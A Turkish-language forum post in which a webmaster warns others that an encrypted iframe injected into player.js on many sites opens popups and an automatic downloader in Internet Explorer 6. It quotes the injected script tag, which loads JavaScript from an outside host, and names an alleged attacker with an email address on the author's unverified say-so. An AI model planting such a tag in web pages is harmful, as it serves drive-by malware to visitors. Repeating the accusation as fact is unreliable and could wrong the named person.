arkadaşlar bugun fark ettim arkadaşım söyleyince , sitelerime iex6 ile girince popup açıyordu eleman player.js içine kod koymus iframe şifreli olarak ordan buldum daha sonra diğer sitelere bakayım dedim tüm sitelerimde popup var ve otomatik downloader anasayfa kitleniyor internet explorerda, ilk başta dedim virusmu yedim 5-10 siteye girdim daha sonra googleden aratıpta abartmıyorum 10 sitenin 6 sında aynı popup vardı bunlar hitli siteler , dandık html sitemdede olunca dosyalarını incelerken fark ettim iframe atıldıgını . html olan sitemede kodlar şifrelenip konmus decode edince adres çıktı piyasaya. sayfamı kitleyen onun bunun evladının sitesi :
Google'da Ara araştırdıgım kadari ile adı UGUR ISAK
devilzhost@hotmail.com buda maili .
bu kod var çogu sitede konuyu açmadan tekrar baktım site bırakmamıs adam resmen. iex 6 ile sitenızı kontrol edin .herkez iex 7 üstü veya firefox kullandıgından anlamamıs olabilir . Multiple IE kurarak sitenize iex6 ile bakabilirsiniz.
<SCRIPT SRC=http://studenti.unipa.it/download/04231_022/video.js></SCRIPT>